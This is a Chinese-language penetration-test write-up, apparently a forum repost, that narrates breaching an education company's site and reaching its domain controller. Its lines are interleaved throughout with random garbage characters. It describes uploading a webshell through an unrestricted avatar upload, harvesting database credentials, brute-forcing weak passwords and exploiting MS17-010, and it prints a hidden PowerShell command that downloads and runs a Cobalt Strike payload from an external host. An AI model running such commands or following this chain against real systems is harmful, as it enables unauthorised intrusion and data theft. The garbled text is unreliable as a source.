; A1 z T/ m: O/ P* V 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路1 F' j* l; |8 h/ h; ~0 g7 y
+ d- i3 P- M/ N9 c% S
$ ~( b5 |+ o4 E9 F1 ]- d
! f# q4 {( a; F8 b- x ; h' v8 A# q1 j4 Z. V9 E5 i
" b% J8 Q7 F/ n 正文! X3 A0 b' S( \* W2 s9 z8 D
8 u+ P; ]2 g" c' {2 d- u: ^, D4 ^8 t3 s2 `- P
9 M# F# o, ]7 V
8 Y; T C' r3 d- O7 G9 D! T( u0 ]5 m& ^$ z6 w+ m1 U2 w
目标:www.xxxx.com(一家教育机构)
( ~: D' i& a$ W2 u' a) S$ z0 a- g& _打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能 r+ ]" i: J/ k; z
. j4 {: y, K0 \/ D; |3 c4 ~0 K4 t: }; x9 t4 {* V" U) J" D; H, \( T" O+ t* e: i
. W( l$ y( T. K& L
( ?% ^; j* m0 B' F5 J: p) E0 T' c7 R( N
进行了简单的信息搜集 # a" B+ {5 Y7 s8 x5 [9 n3 L2 m7 {
% h9 M% G1 P; z+ v' c5 p) S: X" c* B
8 M2 N$ }5 P9 k% |9 F3 F' `2 d& Q7 F* `5 `* G# v
子域名搜集
$ k( O/ l* G) O4 ^" O6 N/ }% _
$ q8 L- P. a" t7 d+ B' m4 ^1 c
* l* B7 p1 p+ G) Q# B* b& m. S6 m1 w
' O( U$ D" g6 H; ^
0 `7 I9 J, T( z2 U
( k3 w. Z" r4 p, r7 s fofa找资产
/ b/ b9 h" C6 {& X- U b S/ R + c- K- s% @2 U' S% Q$ `& u
# @6 j! O9 n( w4 u
% C- `( ^1 }$ N0 f) q& \) r* r! K7 z: p, D1 }
; [5 a- p l! ^, r5 X- {: d+ ^# X
1 {0 K7 L7 o% h8 V
5 U1 b; Z @8 z* a$ H; Q, w# I0 Y
一共七个资产。去重之后只有两个。 / Q, m5 T$ ^ r
9 s8 j" Y) n6 l8 b1 s6 T- V
. _: F' W* U ?; M) j! [0 c. {$ A" S
. }2 p6 ]. D/ q' ~% N. Y4 Y# p/ T5 F$ ^6 ?: b- `8 a+ p
目录探测
& ?- M, S% k0 s4 l* n1 I" E9 q , E- y" T) z8 D* T& q
! n7 l: }" X S9 f) r* p- s% p5 o , M) i' \6 p) c- j; d
# y6 B0 K) D9 e5 a# i' g
: P1 E! z' @& V' ~5 g7 Z
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
9 O# `6 ]6 i. B9 F$ Z/ U+ ?1 j- Z2 [ 6 r7 Y1 Z' {+ X% X5 p6 ]3 t. v' O
5 z- [( @/ X2 C) K6 Q& }9 }* {* Y
. ^( m+ `6 l! Q1 [ j1 i" i
8 t- E5 u5 ]- p( a% `% M 我又尝试了通过修改返回包来绕过登录界面! F$ E' U5 T; F4 N2 [7 G) O2 Q
( x! m0 c0 Y' g V. U+ {( B9 q0 y( } r
# I3 B6 {" V4 |' c
) |& k6 v( x% Z, @) B
+ ?* Q+ c K4 \ 还是不行,尝试注入无果
$ E* D3 ?4 f r' m* z6 f & @, i9 y( N0 l2 }$ H; F; F
7 S" G4 a+ z6 p3 z. Y
9 y- x2 c& S' Y1 Y+ {
* t- p$ w, }6 g' ~8 f, q1 O1 r
不过我目录探测出了一处Spring信息泄露
& y8 D" F% d3 E" U; }
) e5 p' s; s) J1 V" s6 P
) f {/ o7 t! X) `
1 @* B3 L6 ^5 d0 ^: y r& Z/ Q4 J# ]: N" j; Y: A- M
1 M% o6 I9 ?# R2 z# ~8 _9 x
5 s8 n$ _( ^) h W) r# D! o$ B2 I2 z
0 J' K$ A! r1 J# i 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
* E H+ D" ]! u" K5 ~' B
8 b) `2 q* K+ z
& a9 M" [! x0 ~$ h% j* d, ]
2 s2 q4 x. e& d1 z , |. v- [) J4 b) n6 l2 n; a1 K
$ N: c6 w9 w, l 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
9 I4 t* m6 B- S7 A) g2 k* _ 6 p. e. S$ w$ C7 M. u2 Q
/ s. ^5 S3 n5 l, B * H8 g( c% ~2 k6 K$ r, W4 q$ f
5 V0 ]2 B8 e: |) p3 x/ f
; ]1 v- r" b/ H 获取有些师傅到这一步就手机抓包电脑测了。
: N! e3 R- C9 [, q. }; V: j
3 J5 j# ]1 b0 K \5 N# X% {2 M" |
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。9 E2 C0 Y# {+ h/ B6 F1 u( L
8 t1 R* t7 D9 x5 o; j. S
4 n2 w4 s* r) E 其中在一个公众号发现了小程序,可以进行注册。
3 B e7 F, }8 l1 S: V % Z. n* w% x; k, S5 ?
8 M- w6 Y7 H, b( j- @7 z 看到了头像上传,尝试上传获取WebShell; w" }; S4 o; \0 B( F
* d0 I9 T. I8 J% |% B/ d, ]
( A) R; p& J( O% Y e1 i ) L' U3 ?6 C1 V: B, U
7 U5 w0 f0 k' E, `0 g3 G* ~: `' q0 b5 Q7 \& k' M
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问0 o# j* u. X8 M8 F) M# O
- y1 e0 V0 `2 O6 I; ^
3 ?# B& ]9 o6 I
/ x% s: V. H C# d. B! t7 d
1 l: [0 F, V3 G5 a+ \" I$ M) v( E2 l) V) Y/ R( w9 H
然后上了大马
0 a' m; r1 H, P- f0 c. h
3 y6 S6 e2 [2 b+ S
7 q: {5 u4 W/ \! ]: u
- |, x: Q; m6 _6 S" u! O9 T, U9 c
/ F: k* Z5 z5 `6 J# p% G, k/ Y) w4 t' @0 R4 l2 C$ s1 V7 W
x# \8 ~8 Y% _, `; L! A+ e- a [
! n7 k J& k% x9 \
' e; X# z/ t2 E9 A 通过翻找文件发现数据库账号密码3 E5 D6 E5 E+ i4 O
, N5 a+ ?4 h& @; r7 |4 \4 ~3 t
- \& q- g8 E4 m4 u5 [% w( J" n , p. R) x) M. N" K+ ~
- i4 x# `/ e! m
2 _+ Z; g2 F* p --内网渗透& c5 L$ {; S# s7 l- S( f& ^( N
# a" v; G' X; E5 d! c. s! \5 k) Y- Q! v4 g, D( Q7 m3 }
直接通过powershell执行 cs上线
# u7 w" R+ i7 f" p 7 F! L3 s. Q+ ^9 Q. C" _6 j9 e
) T+ v6 R+ ~' A, ?( p y powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
% E8 d7 M: o6 l4 w ( r' Q9 s# s! P9 l
+ e, ~ m. g7 X3 w & ~4 Z. q9 u0 m6 x, J
/ s& j- U. T5 S9 B$ N# f3 Y) W) T9 N6 K, V
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
) g+ |! h, J; ]9 Q* _) d0 p- W # s7 y2 [8 I: ^; Q
8 l) H. b$ Q8 Z- G% @* Z
4 J* F! Q* p7 ~/ V0 s6 [/ y Y
- f8 C, u& ^' G! C% `9 x
2 e8 S: ]2 C- A. [ 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
! ^+ m7 a1 S: x* R& T/ o; p% Q$ {
# N( j2 o) P. ^! x. p+ W 0 J7 E4 N8 [1 L5 r
; D: Z2 k1 Q e
, x4 w' K4 j3 k$ m$ d- e, [2 o6 a1 l8 O7 [3 b9 E) T; ^: |
' y9 Y! y, f/ N& ~# s& z% I9 ]5 c9 ~
0 N: J# Q% J* r1 Y; A. b1 ?; b- T& d! L) Y
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭 - j2 B- D+ ~& Z- W- U
# \1 I9 K: k! B
: G' M+ u B# {. K" L
9 N: H. M& G+ @
' `4 E2 _: ~! \5 ?1 T9 b! i( u% E 7 x/ p" n$ w5 h% l
" {2 |3 O6 z5 A: T# l
( X4 z; z: T: @* Z , Q- |, I1 T& u8 R
. n6 \. d4 ~' n/ w5 \7 @' A6 e8 Q8 f# g: g
. p; \9 q/ {7 F3 ?4 ]* L3 ^) _/ Y' w2 g$ w5 t
. u3 w# J& j$ J: y/ O2 ?/ m u! T ( ]' B& e. I- _; U* a+ \0 e. k' e, r6 U: P
. k* `6 [7 Q$ R
小结* E$ r9 l7 e8 y9 @! g& d# ^
9 c9 }5 e3 ^2 T, W- ?
; s/ j* Z; |! C
3 q6 O* J4 V5 ^; r7 x% Y + `& }5 d! w X. x5 h$ g
6 Y. i! O9 g: H* m
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!0 a E6 O4 L2 b! ]' c
% O: A' d: B g
( g; k6 |4 \$ M- O3 |; F, X) V
8 F- E' Y7 ]6 N7 R3 X; H
) `+ m2 O( a9 [, G! G$ w! Q) S# E- e) t9 V
- * L2 v$ _ N4 s2 U I' z. l
- T3 F5 {5 K1 R" r
+ U4 x' Q6 L; w* p/ G
- ) i4 C8 g9 Y t) k# H1 R5 t9 u
?9 ^+ b b- N2 y' m# N* C: s
/ W9 Z8 _; X' e+ m$ f8 v
: {1 m( b. T/ F& h1 D1 I, S( l$ ^2 b- i( a+ o- h/ {' ]
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html/ a1 C+ X* R; t X7 Z: e1 o+ }
- C* F. E2 F( l" S3 Q& r) b
$ S7 W4 b/ _# C" Z# v( L
8 h9 J" p% I3 h. j4 P& _ |